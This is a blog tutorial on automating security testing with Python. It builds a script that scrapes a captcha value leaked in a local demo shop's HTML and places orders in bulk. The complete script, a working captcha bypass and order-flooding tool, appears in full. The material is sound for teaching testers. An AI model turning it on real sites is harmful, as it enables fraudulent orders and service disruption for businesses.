Automating Stuff with Python

Akansha-Kesharwani

18/08/2017

Automating Stuff with Python

Automating Stuff with Python

What is Automation?

The use of any machine or computer to perform your task efficiently and in very less time can be termed as automation.

Why do we need automated scripts?

Humans can do great stuff, but sometimes we are too lazy to perform some. For example, if I ask you to multiply 345*246 most of you people will open calculator in your devices to calculate the result, rather than using pen paper to solve it. So using automated scripts make our task easy and is less time consuming.

Ever wondered why do we need automated scripts is security testing?

If so then the answer to your question is here. While performing security testing you can across a task that needs to be done multiple times like placing 1 lakh orders to check that the application can be flooded with multiple request. Now, sitting and creating each and every request manually will be a very tough job. So, here we can use automated scripts to perform our job.

Why Python?

Python is a very powerful language containing many libraries. We can perform many powerful task using python and its libraries. So we do not need to write a lengthy code to perform a small task.

We have crafted a small web application having a feature of order placement.

The user need to select the quantity of item and then the user can place order.

Request

Response

Confirmation Page containing captcha

Request

Response

On filling the delivery address, phone number and solving captcha we can successfully place an order.

Application Challenge: Your task here is to place multiple orders near about say 100. How will you do this? I am sure you won’t be solving captcha yourself and filling the form each time. But yes you can write automated script to do this stuff.

Before starting with automation let’s have a look in the captcha code. The feature is protected by captcha. For automating order placement we need to crack this captcha. The captcha is 6 digit numeric code so brute forcing it will take a lot time. But wait, there is something fishy here.

Yeah, we got the captcha code in the HTML body. So we now can parse the HTML response and get this code which will now allow us to automate our stuff.

Let’s begin with the automation. We will follow below steps for automating.

  1. Writing code for option parser. We can use option parser to create options for our script.
  2. Writing code for using proxy, so the each and every request and response is passed and recorded in proxy.
  3. Writing code for performing GET or POST request.
  4. Writing code for parsing the response and getting captcha code from the response.

We can use below code for Option parser:

#Usage help summary
    usage = "./%prog [] -p [proxy] "
    usage += "\nExample: ./%prog -p localhost:8080 "
    
    #Parser options
    parser = OptionParser(usage=usage)
    parser.add_option("-p", type="string",action="store", dest="proxy",help="HTTP Proxy ")
    (options, args) = parser.parse_args()
    
    

After setting the option parser we can write code for using proxy with the script.

#Proxy handler
    def getProxy(): 
        try:
            proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
        except(socket.timeout):
            print("\tProxy timed out...\n\n")
            sys.exit(1)
        return proxy_handler
    
    #Test proxy connection
    def testProxy():
        print("[+] Testing proxy @ %s..." % (options.proxy))
        opener = urllib2.build_opener(getProxy())
        try:
            check = opener.open("http://www.google.com").read()
        except:
            check = 0
            pass
        if check >= 1:
            print("\tProxy is found to be working...\n\n")
        else:
            print("\tProxy failed... Exiting!\n\n")
            sys.exit(1)
    

Performing POST request

opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))  
    #Request Sent to server containing Host, Request body and request headers
    req=urllib2.Request(targetURL,data,headers={})
    check = opener.open(req).read()
    

Now we have our basic work done. We have the script which can send request to the server and receive response from the server, option parser and proxy.

Our next task is to customize this script to perform our task. So we send below request to the server.

targetURL="http://127.0.0.1/blog/index.php"  #Captcha Page url
    data="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1"  #Request body for captcha page
    respHTML = postServerResponse(cj, targetURL, data) #performing post request
    

Parse the response and get captcha code from it.

captcha=re.search("(php\?rand=)(\d+)",respHTML)
    
    

Now with this captcha code we will again send the post request to the server.

targetURL1="http://127.0.0.1/blog/checkout.php" #Captcha is submitted to this url
    data1="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1&address=sdassdce&phn="+str(rand)+"&city=sdcefv&state=rferv&captcha_code="+captcha.group(2) # request body for order placement
    respHTML1= postServerResponse(cj, targetURL1, data1)
    

Parse the new response received to get the order id of the successful order placed.

if re.search("successfully",respHTML1):
            id1=re.search("(order id )(\d+)",resp)
            print "Order Placed successfully with order id: "+id1.group(2)
    else:
            print "Order Not Placed"
    

By combining all the modules we get below script:


    #!/usr/bin/python
    
    # Import Starts
    import sys
    import socket
    import urllib
    import re
    import urllib2
    import string
    import time
    import httplib
    import random
    
    from optparse import OptionParser
    from cookielib import CookieJar
    # Import Ends
    
    #Usage help summary
    usage = "./%prog [] -p [proxy] "
    usage += "\nExample: ./%prog -p localhost:8080 "
    
    #Parser options 
    parser = OptionParser(usage=usage)
    parser.add_option("-p", type="string",action="store", dest="proxy",help="HTTP Proxy ")
    (options, args) = parser.parse_args()
          
    #Proxy handler
    def getProxy(): 
        try:
            proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
        except(socket.timeout):
            print("\tProxy timed out...\n\n")
            sys.exit(1)
        return proxy_handler
    
    #Test proxy connection
    def testProxy():
        print("[+] Testing proxy @ %s..." % (options.proxy))
        opener = urllib2.build_opener(getProxy())
        try:
            check = opener.open("http://www.google.com").read()
        except:
            check = 0
            pass
        if check >= 1:
            print("\tProxy is found to be working...")
        else:
            print("\tProxy failed... Exiting!")
            sys.exit(1)
    
    #Post data to server using POST request
    def postServerResponse(cj, targetURL, data):
        if options.proxy:
            try:
                opener = urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))  
                #Request Sent to server containing Host, Request body and request headers
                req=urllib2.Request(targetURL,data,headers={})
                check = opener.open(req).read()
                return check
            except:
                print("\tProxy connection failed to remote target...")
                sys.exit(1)
        else:
            try:
                opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
                req=urllib2.Request(targetURL,data,headers={})
                check = opener.open(req).read()
                return check
            except:
                print("\tTarget connection failed, check your address...")
                sys.exit(1)
    
    #Try to Place Order
    def placeOrder():
        cj = CookieJar()
        opener=urllib2.build_opener(getProxy(), urllib2.HTTPCookieProcessor(cj))
        targetURL="http://127.0.0.1/blog/index.php" #Captcha Page url
        targetURL1="http://127.0.0.1/blog/checkout.php" #Captcha is submitted to this url
        data="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1" #Request body for captcha page
        respHTML = postServerResponse(cj, targetURL, data)
        captcha=re.search("(php\?rand=)(\d+)",respHTML)
        if captcha:  
          rand=random.randint(7000000000,9999999999)
          data1="margherita=1&dblcheese=1&farmhouse=2&peppy=1&mexican=3&veggie=3&pepper=1&paradise=1&address=sdassdce&phn="+str(rand)+"&city=sdcefv&state=rferv&captcha_code="+captcha.group(2) # request body for order placement
          respHTML1= postServerResponse(cj, targetURL1, data1)
          resp=respHTML1
          if re.search("successfully",respHTML1):
            id1=re.search("(order id )(\d+)",resp)
            print "Order Placed successfully with order id: "+id1.group(2)
          else:
            print "Order Not Placed" 
        else:
          print "Captcha not found"
           
      #Main function      
    def main(): 
      # Check and connect proxy server if specified using -p argument
      if options.proxy:
        testProxy()
      print("\n[+] Running Test...")
      loop=input("Enter number of orders to be placed:")
      for i in range(0,loop):
        placeOrder() 
      print("\n[+] Automated Order Placement. Have fun!...")
        
    if __name__ == "__main__":
        main()
    

Below is the screenshot for script for placing 30 orders:

References:

  1. http://www.dreamsyssoft.com/python-scripting-tutorial/optionparser-tutorial.php
  2. https://docs.python.org/2/library/urllib2.html#urllib2.ProxyHandler
  3. http://www.geeksforgeeks.org/get-post-requests-using-python/

Latest news See all news

28-December-2019
Leipzig, Germany

Visit

Nikhil Mittal will be speaking at CCC events on the topic breaking Microsoft edge extensions security policies 

29-November-2019
Seoul, Korea

Visit

Ashfaq Ansari a.k.a "HackSysTeam", will be delivering Windows Kernel Exploitation Training.

09-October-2019
Delhi, India

Visit

Sudhakar Verma and Krishnakant Patil will be delivering 2 days training on Reverse Engineering at NULLCON Delhi 2019.